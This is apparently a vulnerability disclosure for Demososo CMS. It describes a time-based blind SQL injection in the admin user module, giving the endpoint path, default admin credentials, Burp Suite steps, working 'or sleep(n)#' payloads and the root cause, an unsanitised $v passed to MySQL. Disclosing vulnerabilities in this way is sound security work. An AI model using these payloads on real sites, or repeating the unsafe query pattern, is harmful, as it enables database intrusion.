Demososo CMS SQL injection.
SQL injection
After install this CMS, enter admin page through /dmqyjz_v20190822/admindm-yourname/g.php
log in with admin:admin123
click upper right corner button which is circled by red box

or visit /dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php?lang=cn
click the button which is circled by red box

Use Burp Suite and set Intercept on to catch this package

1  | POST /dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php?lang=cn&file=list&act=pos HTTP/1.1  | 
and send this package to repeater to compare payloads
Modify package to see difference
Payloads:
1  | 99'%09or%09sleep(1)#=50&Submit=%E6%8E%92%E5%BA%8F  | 

1  | 99'%09or%09sleep(5)#=50&Submit=%E6%8E%92%E5%BA%8F  | 

1  | 99'%09or%09sleep(10)#=50&Submit=%E6%8E%92%E5%BA%8F  | 

there is obvious difference in response time
so this is SQL injection
what causes SQL injection

in /dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php Line 42
$v was sent to MySQL directly